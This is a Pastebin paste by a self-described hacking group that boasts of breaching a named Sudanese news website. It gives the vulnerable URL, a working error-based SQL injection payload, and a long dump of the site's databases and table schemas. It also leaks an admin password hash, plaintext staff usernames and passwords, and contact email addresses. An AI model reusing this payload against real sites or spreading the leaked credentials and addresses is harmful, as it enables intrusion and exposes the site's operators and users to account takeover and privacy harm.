Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _____ _____ ______ _____ _____ ______ ______ ______ _____
- ___|\ \|\ \ |\ \ ____|\ \|\ \ |\ \ ___|\ \ ___|\ \ ___|\ \
- / /\ \\\ \| \ \ / /\ \\\ \| \ \ | |\ \| \ \ / /\ \
- | | | |\| \ \ | / / \ \\| \ \ | | |/____/|| ,_____/|| | | |
- | |__| | | \ | || | | || \ | | ___| \| | || \--'\_|/| | |____|
- | .--. | | \ | || | | || \ | || \ \___|/ | /___/| | | ____
- | | | | | |\ \| ||\ \ / /|| |\ \| || |\ \ | \____|\ | | | |
- |____| |____| |____||\_____/|| \_____\/____/ ||____||\_____/||\ ___\|_____| |____ ' /||\ ___\/ /|
- | | | | | |/ \| || \ | || | /| |/ \| ||| | | | | /_____/ || | /____/ |
- |____| |____| |____| |___|/ \|____||____|/ |____| |___|/ \|____|_____| |____| | / \|___| | /
- |_____|/ |____|/
- Laughing at your security since 2012
- Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - MS08-067 - Hannaichi - Th3 Ap3x - OverKiller
- Cyb3r Shzz0r - Mr. BlackList - AN0NT0XIC - Ny0g3n - ThaNarcissist - Mr.MaGnoM
- Injection Point :: http://www.sudan.net/completenews.php?nsid=4925
- Payload :: nsid=4925' AND (SELECT 7394 FROM(SELECT COUNT(*),CONCAT(0x7179737371,(SELECT (CASE WHEN (7394=7394) THEN 1 ELSE 0 END)),0x7177656671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'OrnE'='OrnE
- web application technology :: Apache 2.2.29, PHP 5.4.37
- back-end DBMS :: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- current user: 'sudanne_sudannet@localhost'
- available databases [3]:
- [*] information_schema
- [*] sudanne_openads
- [14 tables]
- +--------------------+
- | phpads_acls |
- +----------------+------------------+
- | Column | Type |
- +----------------+------------------+
- | bannerid | mediumint(9) |
- | comparison | char(2) |
- | data | text |
- | executionorder | int(10) unsigned |
- | logical | set('and','or') |
- | type | varchar(16) |
- +----------------+------------------+
- | phpads_adclicks |
- +----------+--------------+
- | Column | Type |
- +----------+--------------+
- | bannerid | mediumint(9) |
- | country | char(2) |
- | host | varchar(255) |
- | source | varchar(50) |
- | t_stamp | timestamp |
- | zoneid | mediumint(9) |
- +----------+--------------+
- | phpads_adstats |
- +----------+-------------+
- | Column | Type |
- +----------+-------------+
- | day | date |
- | hour | tinyint(4) |
- | bannerid | smallint(6) |
- | clicks | int(11) |
- | source | varchar(50) |
- | views | int(11) |
- | zoneid | smallint(6) |
- +----------+-------------+
- | phpads_adviews |
- +----------+--------------+
- | Column | Type |
- +----------+--------------+
- | bannerid | mediumint(9) |
- | country | char(2) |
- | host | varchar(255) |
- | source | varchar(50) |
- | t_stamp | timestamp |
- | zoneid | mediumint(9) |
- +----------+--------------+
- | phpads_affiliates | (empty)
- +-------------+---------------+
- | Column | Type |
- +-------------+---------------+
- | language | varchar(64) |
- | affiliateid | mediumint(9) |
- | contact | varchar(255) |
- | email | varchar(64) |
- | name | varchar(255) |
- | password | varchar(64) |
- | permissions | mediumint(9) |
- | publiczones | enum('t','f') |
- | username | varchar(64) |
- | website | varchar(255) |
- +-------------+---------------+
- | phpads_banners |
- +--------------------+---------------------------------------------------------------+
- | Column | Type |
- +--------------------+---------------------------------------------------------------+
- | active | enum('t','f') |
- | alt | varchar(255) |
- | append | blob |
- | appendtype | tinyint(4) |
- | autohtml | enum('t','f') |
- | bannerid | mediumint(9) |
- | bannertext | blob |
- | bannertype | tinyint(4) |
- | block | int(11) |
- | capping | int(11) |
- | clientid | mediumint(9) |
- | compiledlimitation | blob |
- | contenttype | enum('gif','jpeg','png','html','swf','dcr','rpm','mov','txt') |
- | description | varchar(255) |
- | filename | varchar(255) |
- | height | smallint(6) |
- | htmlcache | blob |
- | htmltemplate | blob |
- | imageurl | varchar(255) |
- | keyword | varchar(255) |
- | pluginversion | mediumint(9) |
- | priority | int(11) |
- | seq | tinyint(4) |
- | status | varchar(255) |
- | storagetype | enum('sql','web','url','html','network','txt') |
- | target | varchar(24) |
- | transparent | enum('t','f') |
- | url | varchar(255) |
- | weight | tinyint(4) |
- | width | smallint(6) |
- +--------------------+---------------------------------------------------------------+
- | phpads_cache |
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | cacheid | varchar(255) |
- | content | blob |
- +---------+--------------+
- | phpads_clients |
- +------------------+---------------+
- | Column | Type |
- +------------------+---------------+
- | language | varchar(64) |
- | activate | date |
- | active | enum('t','f') |
- | clicks | int(11) |
- | clientid | mediumint(9) |
- | clientname | varchar(255) |
- | clientpassword | varchar(64) |
- | clientusername | varchar(64) |
- | contact | varchar(255) |
- | email | varchar(64) |
- | expire | date |
- | parent | mediumint(9) |
- | permissions | mediumint(9) |
- | report | enum('t','f') |
- | reportdeactivate | enum('t','f') |
- | reportinterval | mediumint(9) |
- | reportlastdate | date |
- | target | int(11) |
- | views | int(11) |
- | weight | tinyint(4) |
- +------------------+---------------+
- | phpads_config |
- +-------------------------------+---------------+
- | Column | Type |
- +-------------------------------+---------------+
- | language | varchar(32) |
- | admin | varchar(64) |
- | admin_email | varchar(64) |
- | admin_email_headers | varchar(64) |
- | admin_fullname | varchar(255) |
- | admin_novice | enum('t','f') |
- | admin_pw | varchar(64) |
- | allow_invocation_frame | enum('t','f') |
- | allow_invocation_interstitial | enum('t','f') |
- | allow_invocation_js | enum('t','f') |
- | allow_invocation_local | enum('t','f') |
- | allow_invocation_plain | enum('t','f') |
- | allow_invocation_popup | enum('t','f') |
- | allow_invocation_xmlrpc | enum('t','f') |
- | auto_clean_tables | enum('t','f') |
- | auto_clean_tables_interval | tinyint(2) |
- | auto_clean_tables_vacuum | enum('t','f') |
- | auto_clean_userlog | enum('t','f') |
- | auto_clean_userlog_interval | tinyint(2) |
- | autotarget_factor | float |
- | begin_of_week | tinyint(2) |
- | client_welcome | enum('t','f') |
- | client_welcome_msg | text |
- | company_name | varchar(255) |
- | config_version | decimal(7,3) |
- | configid | tinyint(2) |
- | content_gzip_compression | enum('t','f') |
- | default_banner_weight | tinyint(4) |
- | default_campaign_weight | tinyint(4) |
- | gui_hide_inactive | enum('t','f') |
- | gui_link_compact_limit | int(11) |
- | gui_show_banner_html | enum('t','f') |
- | gui_show_banner_info | enum('t','f') |
- | gui_show_banner_preview | enum('t','f') |
- | gui_show_campaign_info | enum('t','f') |
- | gui_show_campaign_preview | enum('t','f') |
- | gui_show_matching | enum('t','f') |
- | gui_show_parents | enum('t','f') |
- | instance_id | varchar(64) |
- | main_back_color | varchar(7) |
- | maintenance_cron_timestamp | int(11) |
- | maintenance_timestamp | int(11) |
- | my_footer | varchar(255) |
- | my_header | varchar(255) |
- | name | varchar(32) |
- | override_gd_imageformat | varchar(4) |
- | percentage_decimals | tinyint(2) |
- | qmail_patch | enum('t','f') |
- | table_back_color | varchar(7) |
- | table_back_color_alternative | varchar(7) |
- | table_border_color | varchar(7) |
- | type_html_allow | enum('t','f') |
- | type_sql_allow | enum('t','f') |
- | type_txt_allow | enum('t','f') |
- | type_url_allow | enum('t','f') |
- | type_web_allow | enum('t','f') |
- | type_web_dir | varchar(255) |
- | type_web_ftp | varchar(255) |
- | type_web_mode | tinyint(2) |
- | type_web_url | varchar(255) |
- | updates_cache | text |
- | updates_dev_builds | enum('t','f') |
- | updates_enabled | enum('t','f') |
- | updates_last_seen | decimal(7,3) |
- | updates_timestamp | int(11) |
- | userlog_autoclean | enum('t','f') |
- | userlog_email | enum('t','f') |
- | userlog_priority | enum('t','f') |
- +-------------------------------+---------------+
- | phpads_images |
- +----------+--------------+
- | Column | Type |
- +----------+--------------+
- | contents | mediumblob |
- | filename | varchar(128) |
- | t_stamp | timestamp |
- +----------+--------------+
- | phpads_session |
- +-------------+-------------+
- | Column | Type |
- +-------------+-------------+
- | lastused | timestamp |
- | sessiondata | blob |
- | sessionid | varchar(32) |
- +-------------+-------------+
- | phpads_targetstats |
- +----------+-------------+
- | Column | Type |
- +----------+-------------+
- | day | date |
- | clientid | smallint(6) |
- | modified | tinyint(4) |
- | target | int(11) |
- | views | int(11) |
- +----------+-------------+
- | phpads_userlog |
- +-----------+--------------+
- | Column | Type |
- +-----------+--------------+
- | action | mediumint(9) |
- | timestamp | int(11) |
- | details | blob |
- | object | mediumint(9) |
- | userid | mediumint(9) |
- | userlogid | mediumint(9) |
- | usertype | tinyint(4) |
- +-----------+--------------+
- | phpads_zones |
- +-------------+--------------+
- | Column | Type |
- +-------------+--------------+
- | affiliateid | mediumint(9) |
- | append | blob |
- | appendtype | tinyint(4) |
- | chain | blob |
- | delivery | smallint(6) |
- | description | varchar(255) |
- | height | smallint(6) |
- | prepend | blob |
- | what | blob |
- | width | smallint(6) |
- | zoneid | mediumint(9) |
- | zonename | varchar(245) |
- | zonetype | smallint(6) |
- +-------------+--------------+
- [*] sudanne_sudannet
- [49 tables]
- +-------------------------+
- | admin |
- +----------+--------------+
- | Column | Type |
- +----------+--------------+
- | password | varchar(255) |
- | username | varchar(255) |
- +----------+----------------------------------+
- | username | password |
- +----------+----------------------------------+
- | admin | 7391edbe8f3acbea449acdfa236ce878 |
- +----------+----------------------------------+
- | cms |
- +--------------+--------------+
- | Column | Type |
- +--------------+--------------+
- | cms_desc | text |
- | cms_flag | char(1) |
- | cms_id | int(11) |
- | cms_img | varchar(200) |
- | cms_title | varchar(255) |
- | page_desc | text |
- | page_keyword | text |
- | page_title | varchar(250) |
- +--------------+--------------+
- | gen_setting |
- +--------+---------+
- | Column | Type |
- +--------+---------+
- | email | text |
- | flag | char(1) |
- | id | int(11) |
- | type | char(1) |
- +----+------+------+-------------------+
- | id | flag | type | email |
- +----+------+------+-------------------+
- | 1 | y | c | muaz@sudan.net |
- | 2 | y | b | taxstar@gmail.com |
- +----+------+------+-------------------+
- | tblarcdgames |
- +------------+--------------+
- | Column | Type |
- +------------+--------------+
- | order | int(4) |
- | flag | char(1) |
- | gamesdesc | text |
- | gamesfile | varchar(250) |
- | gamesid | int(11) |
- | gamestitle | varchar(250) |
- | imagefile | varchar(250) |
- +------------+--------------+
- | tblarticlemaster |
- +------------------+--------------+
- | Column | Type |
- +------------------+--------------+
- | ArticleId | smallint(6) |
- | CategoryId | smallint(6) |
- | CreateDt | date |
- | CurrentStatus | smallint(6) |
- | Description | longtext |
- | DesignTemplateId | smallint(6) |
- | MetaTag | longtext |
- | SubCategoryId | smallint(6) |
- | SubSubCategoryId | smallint(6) |
- | Title | varchar(255) |
- +------------------+--------------+
- | tblbdwrds |
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | bdword | varchar(255) |
- | bdwrdid | int(11) |
- +---------+--------------+
- | tblcard |
- +--------------+--------------+
- | Column | Type |
- +--------------+--------------+
- | card_desc | text |
- | card_id | int(11) |
- | card_img | varchar(255) |
- | card_img_alt | varchar(255) |
- | card_title | varchar(255) |
- | card_type | char(1) |
- | cat_id | int(11) |
- | flag | char(1) |
- +--------------+--------------+
- | tblcardcat |
- +----------+--------------+
- | Column | Type |
- +----------+--------------+
- | cat_id | int(11) |
- | category | varchar(250) |
- | flag | char(1) |
- +----------+--------------+
- | tblcardgreet |
- +-------------+--------------+
- | Column | Type |
- +-------------+--------------+
- | card_footer | varchar(255) |
- | card_header | varchar(255) |
- | card_id | int(11) |
- | card_msg | text |
- | femail | varchar(250) |
- | fname | varchar(250) |
- | greet_id | int(11) |
- | musicid | int(11) |
- | send_dt | date |
- | temail | varchar(250) |
- | tname | varchar(250) |
- +-------------+--------------+ (dumped)
- | tblcategory |
- +----------------+--------------+
- | Column | Type |
- +----------------+--------------+
- | alt_txt | varchar(250) |
- | cat_id | int(11) |
- | category_typ | char(1) |
- | catord | int(11) |
- | checkbox | char(1) |
- | ext_lnk | varchar(250) |
- | popupwin | char(1) |
- | sudan_category | varchar(250) |
- +----------------+--------------+
- | tblcategorymaster |
- +-----------------+--------------+
- | Column | Type |
- +-----------------+--------------+
- | CategoryId | smallint(6) |
- | CategoryName | varchar(100) |
- | CreateDt | datetime |
- | CurrentStatus | smallint(6) |
- | Description | longtext |
- | Sequence | smallint(6) |
- | StaticLink | char(1) |
- | StaticLinkName | varchar(255) |
- | TitleMetaDetail | longtext |
- +-----------------+--------------+
- | tblcms |
- +--------------+--------------+
- | Column | Type |
- +--------------+--------------+
- | cat_id | int(11) |
- | cms_desc | longtext |
- | cms_flag | char(1) |
- | cms_id | int(11) |
- | cms_img | varchar(200) |
- | cms_title | varchar(255) |
- | page_desc | text |
- | page_keyword | text |
- | page_title | varchar(250) |
- | page_url | varchar(250) |
- | scat_id | int(11) |
- +--------------+--------------+
- | tblcontacts |
- +----------+--------------+
- | Column | Type |
- +----------+--------------+
- | cntemail | varchar(250) |
- | cntid | int(11) |
- | cnttitle | varchar(250) |
- | flag | char(1) |
- +-------+------+------------------+---------------------+
- | cntid | flag | cnttitle | cntemail |
- +-------+------+------------------+---------------------+
- | 2 | y | *Sales | sales@sudan.net |
- | 3 | y | *Support | support@sudan.net |
- | 4 | y | *General Contact | webmaster@sudan.net |
- +-------+------+------------------+---------------------+
- | tbldesigntemplate |
- | tbleventmaster |
- | tblextlinkmaster |
- | tblgallerymaster |
- | tblgbsndmsg |
- | tblgbusr |
- +------------+--------------+
- | Column | Type |
- +------------+--------------+
- | admincmnts | text |
- | admindt | date |
- | country | varchar(255) |
- | email | varchar(255) |
- | flag | char(1) |
- | gb_id | int(11) |
- | homepage | varchar(255) |
- | message | text |
- | postdt | date |
- | usrname | varchar(255) |
- +------------+--------------+ (dumped)
- | tblimagemaster |
- | tbllinkmaster |
- | tbllogin |
- +------------------+--------------+
- | Column | Type |
- +------------------+--------------+
- | addscrollingnews | char(1) |
- | CurrentStatus | bigint(20) |
- | LoginId | smallint(6) |
- | massdelete | char(1) |
- | newscatids | varchar(255) |
- | Password | varchar(100) |
- | UserName | varchar(100) |
- +---------+------------+----------+----------+------------+---------------+------------------+
- | LoginId | newscatids | UserName | Password | massdelete | CurrentStatus | addscrollingnews |
- +---------+------------+----------+----------+------------+---------------+------------------+
- | 1 | NULL | admin | admin | Y | 0 | N |
- | 2 | NULL | News | news | Y | 1 | N |
- | 3 | NULL | press | press | Y | 2 | N |
- | 4 | NULL | comm | comm | Y | 3 | N |
- | 5 | NULL | test | test | Y | 1 | N |
- +---------+------------+----------+----------+------------+---------------+------------------+
- | tblmapstat |
- | tblnews |
- | tblnewscategory |
- | tblnewscategorymaster |
- | tblnewslogin |
- | tblnewsmaster |
- | tblnewstalkbk |
- | tblphotogal |
- | tblpollans |
- | tblpollattachid |
- | tblpollmaster |
- | tblpollques |
- | tblpollrslt |
- | tblproverbmaster |
- | tblrotmusic |
- | tblsectionmaster |
- | tblsettings |
- | tblsubcategory |
- | tblsubcategorymaster |
- | tblsubsubcategorymaster |
- | tbltalkbackmaster |
- | tbltopimg |
- | tblusers |
- +-----------+--------------+
- | Column | Type |
- +-----------+--------------+
- | email | varchar(30) |
- | firstname | varchar(255) |
- | flag | char(1) |
- | lastname | varchar(255) |
- | password | varchar(255) |
- | phone | int(25) |
- | user_id | int(25) |
- | username | varchar(255) |
- | website | varchar(50) | (dumped)
- +-----------+--------------+
- | tblweathericonmaster |
- | tblweathermaster |
- | vgb__country |
- | weather_xml |
- +-------------------------+
Add Comment
Please, Sign In to add comment